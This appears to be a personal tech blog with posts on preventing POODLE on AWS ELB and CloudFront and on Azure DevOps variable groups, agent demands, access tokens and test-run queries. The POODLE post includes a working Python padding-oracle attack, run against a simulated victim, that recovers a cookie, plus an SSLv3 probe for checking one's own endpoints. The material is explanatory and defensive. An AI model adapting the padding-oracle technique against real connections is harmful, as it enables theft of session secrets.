My Quotes


When you were born, you cried and the world rejoiced.
Live your life in such a way that when you go,
THE WORLD SHOULD CRY






Tuesday, July 23, 2019

How to Prevent POODLE Attacks on AWS ELB And CloudFront

    What is POODLE?
  1. To maintain compatibility with legacy servers, many TLS clients implement a "downgrade dance": in a first handshake attempt they offer the highest protocol version they support;
  2. if this handshake fails, they retry (possibly repeatedly) with earlier protocol versions.
  3. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches or by active attackers.
  4. So if an attacker who controls the network between client and server interferes with every handshake that offers TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0.
  5. Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher in CBC mode.
  6. RC4 is well known to have biases, meaning that if the same secret (such as a password or HTTP cookie) is sent over many connections and thus encrypted with many RC4 streams, more and more information about it leaks.
  7. In CBC mode, SSL 3.0 appends padding after the MAC; the padding bytes are not covered by the MAC, and the receiver checks only the final padding-length byte. An attacker who can make the browser send many requests (e.g. via injected JavaScript) and can tamper with the records in transit copies a ciphertext block into the final, all-padding position and watches whether the server accepts the record: acceptance reveals one byte of that block, so a cookie byte is recovered after about 256 requests. This is the POODLE attack.
  8. Unlike with the BEAST and Lucky 13 attacks, there is no reasonable workaround; the flaw is the SSL 3.0 padding design itself.
  9. This leaves us with no secure SSL 3.0 cipher suites at all: to achieve secure encryption, SSL 3.0 must be avoided entirely.
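To make the CBC padding problem above concrete, here is an added example (not from the POODLE paper and not AWS code) that simulates the padding oracle end to end. It assumes a toy 4-round Feistel block cipher in place of AES/3DES (the attack depends only on CBC mode, not on the cipher), HMAC-SHA256 as the record MAC, and a constructed victim pair whose cookie is `session=deadbeef`; the attacker chooses the filler around the cookie and tampers with records, but never sees the keys.

```python
"""POODLE walkthrough: padding-oracle recovery of a cookie from SSL 3.0-style CBC records.
Added example for this post, not from the POODLE paper or from AWS. The block cipher is a
toy 4-round Feistel network (stands in for AES/3DES; the attack only needs CBC mode), and
the record format, the victim browser/server pair and the cookie are all constructed here."""
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size in bytes
MAC_LEN = 32  # HMAC-SHA256 tag length

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # Feistel round function: 8-byte keyed PRF output
    return hmac.new(key + bytes([rnd]), half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def ssl3_seal(key, mac_key, data):
    """SSL 3.0 record: data || MAC || padding || padding_length, CBC-encrypted under a fresh IV.
    The padding bytes are unspecified by SSL 3.0 and are not covered by the MAC."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = prev = os.urandom(BLOCK)
    out = b""
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(key, _xor(body[i:i + BLOCK], prev))
        out += prev
    return iv + out

def ssl3_open(key, mac_key, record):
    """Receiver check as SSL 3.0 specifies it: only the final length byte of the padding
    is validated, then the MAC is verified. Returns True if the record is accepted."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    pt, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        pt += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    pad_len = pt[-1]
    if pad_len >= BLOCK:              # the only padding check SSL 3.0 makes
        return False
    body = pt[:len(pt) - pad_len - 1]
    if len(body) < MAC_LEN:
        return False
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(tag, hmac.new(mac_key, data, hashlib.sha256).digest())

class Victim:
    """Browser and server sharing session keys (constructed). The attacker controls how much
    filler goes before and after the secret cookie and can tamper with records in transit,
    but never sees the keys. Every request is a new record with a fresh IV."""
    def __init__(self, cookie):
        self.key, self.mac_key, self.cookie = os.urandom(16), os.urandom(16), cookie

    def request(self, prefix_len, suffix_len):
        return ssl3_seal(self.key, self.mac_key, b"A" * prefix_len + self.cookie + b"B" * suffix_len)

    def accepts(self, record):
        return ssl3_open(self.key, self.mac_key, record)

def poodle_recover(victim, cookie_len, max_tries=20000):
    """Recover the cookie byte by byte: about 256 requests per byte on average."""
    recovered = b""
    for k in range(cookie_len):
        # Align cookie[k] to the last byte of some plaintext block, and size the body so the
        # record ends with a block that is nothing but padding (padding_length == BLOCK-1).
        prefix_len = (BLOCK - 1 - k) % BLOCK
        suffix_len = -(prefix_len + cookie_len + MAC_LEN) % BLOCK
        t = (prefix_len + k) // BLOCK + 1      # index of the target block (index 0 is the IV)
        for _ in range(max_tries):
            rec = victim.request(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            tampered = b"".join(blocks[:-1]) + blocks[t]   # copy target block over the padding block
            if victim.accepts(tampered):
                # Accepted, so D(C_t)[-1] ^ C_{n-2}[-1] == BLOCK-1; the real plaintext byte
                # of the target block is D(C_t)[-1] ^ C_{t-1}[-1].
                recovered += bytes([(BLOCK - 1) ^ blocks[-2][-1] ^ blocks[t - 1][-1]])
                break
        else:
            raise RuntimeError("oracle never accepted the tampered record")
    return recovered

if __name__ == "__main__":
    v = Victim(b"session=deadbeef")
    print(poodle_recover(v, 16))   # b'session=deadbeef'
```

Note what the server never sees: every tampered record is either rejected (padding length wrong, or MAC fails after the wrong amount is stripped) or accepted as a perfectly valid record, so from the server's side the attack looks like ordinary traffic with occasional bad records. That is why the only fix is to turn SSL 3.0 off.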
    Disable the SSLv3 Protocol to handle POODLE attacks on CloudFront
  1. As with Amazon ELB, AWS has already disabled SSLv3 for customers who use the default (*.cloudfront.net) SSL settings and for custom certificates served with SNI.
  2. Customers who serve a custom SSL certificate from a dedicated IP address (where SSLv3 was kept on for old clients without SNI support) should disable the SSLv3 protocol manually by following the steps below in the Amazon CloudFront Management Console:
  3. Select your distribution, then click “Distribution Settings”.
  4. Click the “Edit” button on the “General” tab.
  5. In the “Custom SSL Client Support” section, select the option that says: “Only Clients that Support Server Name Indication (SNI)”.
  6. Click “Yes, Edit” to save these revised settings.
  7. Check: newer versions of the console also show a “Security Policy” (minimum TLS version) next to the certificate settings. Choosing a TLSv1.2 policy, rather than only removing SSLv3, also closes off the weak TLS 1.0/1.1 cipher suites.
    Disable the SSLv3 Protocol to handle POODLE on Amazon AWS ELB
  1. All ELBs created after 10/14/2014 5:00 PM PDT use a new SSL negotiation policy that no longer enables SSLv3 by default.
  2. For existing ELBs it is necessary to disable SSLv3 manually via the AWS Management Console:
  3. Select your load balancer (EC2 -> Load Balancers) in the appropriate region.
  4. In the Listeners tab, click “Change” in the Cipher column.
  5. Ensure that the radio button for “Predefined Security Policy” is selected, and in the dropdown select the “ELBSecurityPolicy-2014-10” policy (a later predefined policy such as ELBSecurityPolicy-TLS-1-2-2017-01 also drops TLS 1.0 and 1.1).
  6. You can see that Protocol-SSLv3 is unchecked after selecting the policy.
  7. Click “Save” to apply the settings to the listener.
  8. Repeat these steps for each listener that uses HTTPS or SSL, on each load balancer.
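After changing either the CloudFront or the ELB setting, confirm it from the outside. The usual `openssl s_client -ssl3` check often is not available because most current OpenSSL builds are compiled without SSLv3, so here is an added example (not an AWS tool, not part of the original post) that sends a raw SSL 3.0 ClientHello and reads the first record the server returns. The cipher-suite list and the two sample responses are constructed for the example; `probe()` talks to the network, `classify_response()` runs offline.

```python
"""Does an endpoint still accept SSL 3.0? Send a raw SSLv3 ClientHello and read the first
record back. Added example for this post (not an AWS tool). probe() uses the network;
classify_response() is exercised offline on constructed records."""
import os
import socket
import struct

SSLV3 = b"\x03\x00"
# Cipher suites an SSL 3.0 server would recognise: AES-CBC, 3DES-CBC and RC4 (IANA codes).
SSLV3_SUITES = (0x002F, 0x0035, 0x000A, 0x0005, 0x0004)

def build_sslv3_client_hello():
    """TLS record (type 22) carrying a client_hello whose version fields are 3.0."""
    suites = b"".join(struct.pack("!H", s) for s in SSLV3_SUITES)
    body = (SSLV3 + os.urandom(32) + b"\x00"          # client_version, random, empty session_id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00")                               # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body           # HandshakeType client_hello
    return b"\x16" + SSLV3 + struct.pack("!H", len(handshake)) + handshake  # ContentType handshake

def classify_response(data):
    """'sslv3-accepted' if the server answered with an SSL 3.0 ServerHello, 'refused' if it
    sent an alert or closed the connection, 'unexpected' for anything else."""
    if len(data) < 5:
        return "refused"                     # closed without a complete record
    ctype = data[0]
    if ctype == 21:                          # alert (handshake_failure or protocol_version)
        return "refused"
    if ctype == 22 and len(data) >= 11 and data[5] == 2:   # handshake record with a ServerHello
        return "sslv3-accepted" if data[9:11] == SSLV3 else "unexpected"
    return "unexpected"

def probe(host, port=443, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_sslv3_client_hello())
        try:
            data = s.recv(4096)
        except OSError:                      # timeout or reset, treated like a close
            data = b""
    return classify_response(data)

# Constructed sample responses (not captured from a real server):
ALERT_HANDSHAKE_FAILURE = b"\x15\x03\x00\x00\x02\x02\x28"    # fatal (2) handshake_failure (40)
SSLV3_SERVER_HELLO = (b"\x16\x03\x00\x00\x2a"                  # handshake record, 42 bytes
                      + b"\x02\x00\x00\x26"                     # ServerHello, 38-byte body
                      + SSLV3 + b"\x00" * 32 + b"\x00"          # version 3.0, random, empty session_id
                      + b"\x00\x2f\x00")                        # TLS_RSA_WITH_AES_128_CBC_SHA, null compression

if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        print(host, probe(host))
```

Run it against the ELB or CloudFront hostname (e.g. `python probe.py d111111abcdef8.cloudfront.net`, a made-up name); `refused` is the result you want. For a dedicated-IP CloudFront distribution, remember that the test must reach the distribution's own address, not an SNI-only endpoint.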

Thursday, January 3, 2019

Azure Dev Ops - Variable Group


  1. In ADO you may want to use variables that are shared across many jobs in the pipeline.
  2. Rather than defining them in each and every pipeline job, ADO gives the option to define them once as a Variable Group.
  3. Once defined, the variables in the group can be linked to any job in the pipeline.
  4. Manage Variables Groups --> Create
  5. Make sure “Allow access to all pipelines” is ENABLED if every pipeline in the project should be able to read the group. Note that this also exposes any secret variables in the group to every pipeline, so for a group holding credentials leave it off and authorize only the pipelines that need it.
  6. From Builds --> Variables --> Variable Groups --> Link Variable Groups
  7. Select the group and click on Link.
  8. You should now be able to use the variables declared in the group.

Azure Dev Ops- Invoke Agent Demands


  1. In ADO you may want to force pipeline builds to run on a specific agent in an agent pool.
  2. This is possible via “Demands” on the pipeline build, as shown below.
  3. The scenario: run the TASK only on an agent with a particular name (the demand compares the Agent.Name capability with that name).
  4. When the job is queued, ADO compares the demands with the capabilities of each agent in the pool; the job is dispatched only to an agent that satisfies all of them.
  5. Until such an agent is available the job waits in the queue; it is never run on an agent that does not match.
  6. The same mechanism can require any other capability the agent advertises (for example an installed tool version) at queue time.

Azure Dev Ops - Personal Access Tokens

In my previous post, I mentioned that in order to use REST API calls in ADO you need TOKENS to invoke the REST calls.

Here is the mechanism to generate a Personal Access Token:

  1. Click on AZURE DEV OPS
  2. Click on your Profile
  3. Click on Personal Access Token
  4. Copy the TOKEN from the SUCCESS screen into the REST API call. The token is shown only once, so store it as a secret (a pipeline secret variable or a secret store), never inside a script. Give it the shortest expiry and the narrowest scope the call needs: reading test runs needs only Test Management (Read).

Capture last TEST Run results AZURE DevOps

You can retrieve the list of test runs, sort the result descending on ID (the most recent test run has the greatest ID), then take the first item. All of this is shown below in PowerShell:

$testingBaseUrl = "https://dev.azure.com/cbre/Research%20Engine/_apis/test/runs"
$testingUrl = $testingBaseUrl + "?api-version=5.0-preview.2"

write-host $testingUrl


#credentials for the REST calls: user name and Personal Access Token
$username = "RKesavana"
$token = "your token"  # refer to my blog post on how to create Personal Access Tokens; do not commit a real PAT, read it from a secret variable instead (e.g. $env:ADO_PAT)

#create auth header to use for REST calls 
$accessToken = ("{0}:{1}" -f $username,$token) 
$accessToken = [System.Text.Encoding]::UTF8.GetBytes($accessToken) 
$accessToken = [System.Convert]::ToBase64String($accessToken) 
$headers = @{Authorization=("Basic {0}" -f $accessToken)} 


try{
# write-host "To fetch LIST all the Test ID's information"
$testRuns=Invoke-RestMethod -Uri $testingUrl -Method Get -Headers $headers
$testRunsIdSorted = $testRuns.value | sort-object id -Descending
# write-host $testRunsIdSorted

$testURLByRunID= $testingBaseUrl+"/"+$($testRunsIdSorted[0].id)
$testURLByRunID= $testURLByRunID+ "?api-version=5.0"
$testURLByRunID = $testURLByRunID + "-preview.2"

write-host "To fetch the MOST RECENT run Test RUN ID"
write-host $testURLByRunID
$mostRecentTestRun = Invoke-RestMethod -Uri  $testURLByRunID -Headers $headers -Method Get | Select-Object id,name,url,build,isAutomated,iteration,owner,project,startedDate,completedDate,state,totalTests,incompleteTests,notApplicableTests,passedTests,unanalyzedTests,revision,webAccessUrl

#PRINT the values from the  REST calls 

write-host  "owner" $mostRecentTestRun.owner
write-host "startedDate" $mostRecentTestRun.startedDate
write-host "completedDate" $mostRecentTestRun.completedDate
write-host "totalTests" $mostRecentTestRun.totalTests
write-host "incompleteTests" $mostRecentTestRun.incompleteTests
write-host "notApplicableTests" $mostRecentTestRun.notApplicableTests
write-host "passedTests" $mostRecentTestRun.passedTests
write-host "unanalyzedTests" $mostRecentTestRun.unanalyzedTests
write-host "revision" $mostRecentTestRun.revision
write-host "webAccessUrl" $mostRecentTestRun.webAccessUrl


#expose the most recent run's ID to later tasks in the pipeline as $(mostRecentRun)
write-Host "##vso[task.setvariable variable=mostRecentRun;]$($mostRecentTestRun.id)"


}  Catch  {
  # print the HTTP error body: $_.ErrorDetails carries it in PowerShell 7,
  # the response stream in Windows PowerShell 5.1 (HttpWebResponse)
  if ($_.ErrorDetails) {
    write-host $_.ErrorDetails.Message
  } else {
    $exception = $_.Exception
    $respstream = $exception.Response.GetResponseStream()
    $sr = new-object System.IO.StreamReader $respstream
    $ErrorResult = $sr.ReadToEnd()
    write-host $ErrorResult
  }
}